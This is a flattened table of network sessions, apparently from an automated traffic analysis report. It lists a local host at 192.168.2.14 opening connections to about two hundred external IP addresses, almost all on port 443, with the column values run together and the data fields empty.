                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14425192.168.2.1440026200.74.113.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14426192.168.2.1439948192.163.56.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14427192.168.2.1439870107.132.179.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14428192.168.2.1440964101.29.136.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14429192.168.2.145330632.176.233.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14430192.168.2.1449604158.212.84.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14431192.168.2.145916876.58.1.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14432192.168.2.143740080.75.254.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14433192.168.2.143917662.173.90.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14434192.168.2.145673253.234.65.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14435192.168.2.144635694.40.66.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14436192.168.2.144662890.239.105.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14437192.168.2.1437512151.154.213.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14438192.168.2.143609884.61.187.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14439192.168.2.145894813.63.205.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14440192.168.2.145681283.120.203.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14441192.168.2.1450470213.115.172.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14442192.168.2.145622023.87.45.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14443192.168.2.144007064.154.80.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14444192.168.2.1446586163.157.225.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14445192.168.2.144751841.19.140.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14446192.168.2.1455738209.26.165.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14447192.168.2.1456062123.134.185.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14448192.168.2.146055070.71.254.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14449192.168.2.143345691.69.88.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14450192.168.2.14403662.200.8.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14451192.168.2.1454342208.133.10.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14452192.168.2.14502961.121.74.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14453192.168.2.1449370180.62.118.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14454192.168.2.144286839.116.237.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14455192.168.2.143772091.77.78.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14456192.168.2.1449246114.172.184.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14457192.168.2.145589484.154.23.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14458192.168.2.1438554147.48.228.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14459192.168.2.145970237.240.70.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14460192.168.2.144823873.145.41.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14461192.168.2.1449412179.9.89.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14462192.168.2.144117491.57.158.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14463192.168.2.1457848158.169.18.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14464192.168.2.1433120194.8.77.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14465192.168.2.1442594131.200.101.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14466192.168.2.1448522205.115.63.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14467192.168.2.143348293.21.13.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14468192.168.2.1448258186.132.19.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14469192.168.2.144088676.90.183.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14470192.168.2.1460452194.11.152.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14471192.168.2.1451796166.184.115.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14472192.168.2.145303275.173.67.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14473192.168.2.1435214163.225.204.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14474192.168.2.144189070.0.1.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14475192.168.2.1434998143.187.97.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14476192.168.2.1447502208.214.160.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14477192.168.2.143980296.251.229.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14478192.168.2.145678661.250.67.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14479192.168.2.1458196109.36.107.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14480192.168.2.144204846.33.29.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14481192.168.2.1434078109.255.180.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14482192.168.2.1433450102.205.241.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14483192.168.2.1457076207.28.80.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14484192.168.2.1436920221.7.171.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14485192.168.2.143705696.169.178.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14486192.168.2.1452534100.196.92.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14487192.168.2.1434776183.196.251.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14488192.168.2.144073267.169.143.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14489192.168.2.1452414176.67.178.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14490192.168.2.1443404136.5.227.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14491192.168.2.143311476.91.31.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14492192.168.2.145457217.2.183.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14493192.168.2.1456746155.238.75.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14494192.168.2.145439095.151.124.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14495192.168.2.144750042.44.206.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14496192.168.2.143996486.9.204.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14497192.168.2.1449326190.12.21.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14498192.168.2.1452482194.95.68.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14499192.168.2.1445124114.47.114.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14500192.168.2.145702251.121.69.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14501192.168.2.145204681.59.139.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14502192.168.2.1450246168.204.147.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14503192.168.2.1438770186.181.21.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14504192.168.2.146010086.179.102.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14505192.168.2.1449514137.38.94.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14506192.168.2.144616618.19.62.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14507192.168.2.1434664114.56.62.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14508192.168.2.1450344178.238.250.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14509192.168.2.144238851.107.33.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14510192.168.2.145763842.47.41.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14511192.168.2.1457616220.170.108.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14512192.168.2.1460080204.110.46.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14513192.168.2.1438582168.250.211.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14514192.168.2.1445864106.118.243.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14515192.168.2.145783082.4.138.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14516192.168.2.1447162144.222.212.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14517192.168.2.1453900150.12.69.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14518192.168.2.143681266.179.11.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14519192.168.2.143577436.4.235.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14520192.168.2.1434182107.130.109.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14521192.168.2.145596453.41.11.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14522192.168.2.1443736164.122.162.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14523192.168.2.1447950121.112.96.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14524192.168.2.1435018200.117.56.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14525192.168.2.1438758122.221.215.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14526192.168.2.1452982202.27.18.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14527192.168.2.1453720179.50.254.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14528192.168.2.143966661.78.224.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14529192.168.2.1443186209.100.39.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14530192.168.2.1454418138.252.48.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14531192.168.2.1455900132.161.6.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14532192.168.2.143617696.233.142.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14533192.168.2.144531253.66.250.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14534192.168.2.1448136149.84.71.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14535192.168.2.1445568102.55.144.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14536192.168.2.144770866.247.193.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14537192.168.2.145762278.144.153.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14538192.168.2.145334495.255.84.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14539192.168.2.144961036.47.73.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14540192.168.2.145631820.133.253.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14541192.168.2.1440108104.113.91.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14542192.168.2.146077059.83.5.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14543192.168.2.144887697.59.129.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14544192.168.2.1444626196.39.81.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14545192.168.2.1451040200.37.48.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14546192.168.2.1436668195.219.162.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14547192.168.2.144547648.198.14.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14548192.168.2.1450956105.187.189.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14549192.168.2.1455632183.160.166.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14550192.168.2.145512024.19.217.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14551192.168.2.143603852.55.121.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14552192.168.2.1434658129.43.74.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14553192.168.2.1459474186.202.255.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14554192.168.2.145859853.50.68.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14555192.168.2.1438224184.132.49.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14556192.168.2.143740443.169.142.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14557192.168.2.144341084.28.139.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14558192.168.2.1455280172.54.236.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14559192.168.2.1437840206.14.203.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14560192.168.2.144138873.32.8.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14561192.168.2.1450130174.189.41.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14562192.168.2.1453774177.176.104.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14563192.168.2.145278466.11.30.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14564192.168.2.145009243.210.165.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14565192.168.2.144266873.121.135.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14566192.168.2.1458480197.5.184.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14567192.168.2.145820473.220.219.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14568192.168.2.1448434165.235.229.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14569192.168.2.1457468172.5.16.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14570192.168.2.1435804148.9.45.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14571192.168.2.1454640123.219.153.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14572192.168.2.1451338151.43.32.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14573192.168.2.143766453.91.187.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14574192.168.2.1456822109.148.193.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14575192.168.2.1449438153.160.8.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14576192.168.2.1459540198.118.105.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14577192.168.2.1444618106.142.74.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14578192.168.2.145320820.5.92.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14579192.168.2.1452432105.249.67.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14580192.168.2.144581495.248.234.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14581192.168.2.1433278221.90.130.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14582192.168.2.1437194148.158.38.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14583192.168.2.143537012.217.99.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14584192.168.2.143608670.109.194.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14585192.168.2.1445428150.91.138.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14586192.168.2.1440074185.36.252.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14587192.168.2.1456762208.241.35.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14588192.168.2.1437104126.17.136.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14589192.168.2.1439764216.147.21.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14590192.168.2.143879486.25.30.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14591192.168.2.1441866139.135.144.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14592192.168.2.1453126137.201.27.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14593192.168.2.145036478.137.206.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14594192.168.2.145504074.117.199.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14595192.168.2.143970234.133.209.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14596192.168.2.1439426177.111.161.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14597192.168.2.144295689.97.137.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14598192.168.2.1443446155.169.58.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14599192.168.2.144578854.65.183.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14600192.168.2.1459384109.122.95.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14601192.168.2.143592886.146.165.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14602192.168.2.1444884115.252.129.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14603192.168.2.144141686.70.14.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14604192.168.2.145595664.83.244.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14605192.168.2.1458992220.67.248.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14606192.168.2.145820612.67.90.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14607192.168.2.144562473.86.165.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14608192.168.2.145528224.65.49.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14609192.168.2.1435260114.179.175.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14610192.168.2.145302632.131.52.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14611192.168.2.1446880206.222.173.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14612192.168.2.1448316133.51.22.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14613192.168.2.1448962222.115.145.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14614192.168.2.14333802.34.67.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14615192.168.2.1448120117.119.76.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14616192.168.2.1436532205.41.44.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14617192.168.2.144320860.192.75.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14618192.168.2.1454674141.138.170.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14619192.168.2.1455378222.44.29.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14620192.168.2.1436190115.182.160.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14621192.168.2.1459708104.17.237.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14622192.168.2.1438236140.119.241.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14623192.168.2.1457732144.222.106.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14624192.168.2.1453850104.92.128.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14625192.168.2.1457136205.206.200.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14626192.168.2.1440880151.0.237.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14627192.168.2.1443254130.83.182.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14628192.168.2.1454952197.53.44.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14629192.168.2.144645689.77.204.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14630192.168.2.1433164122.242.63.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14631192.168.2.144251093.251.147.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14632192.168.2.1453388185.26.199.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14633192.168.2.1434702109.149.113.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14634192.168.2.1448710191.4.165.2328080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14635192.168.2.1434498123.230.71.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14636192.168.2.144868864.122.245.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14637192.168.2.144048225.68.197.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14638192.168.2.1453176204.232.96.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14639192.168.2.1449406210.164.129.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14640192.168.2.1433724192.28.148.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14641192.168.2.1446460176.119.66.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14642192.168.2.145953072.24.155.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14643192.168.2.1458654218.126.126.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14644192.168.2.143588098.126.245.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14645192.168.2.1454358213.202.141.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
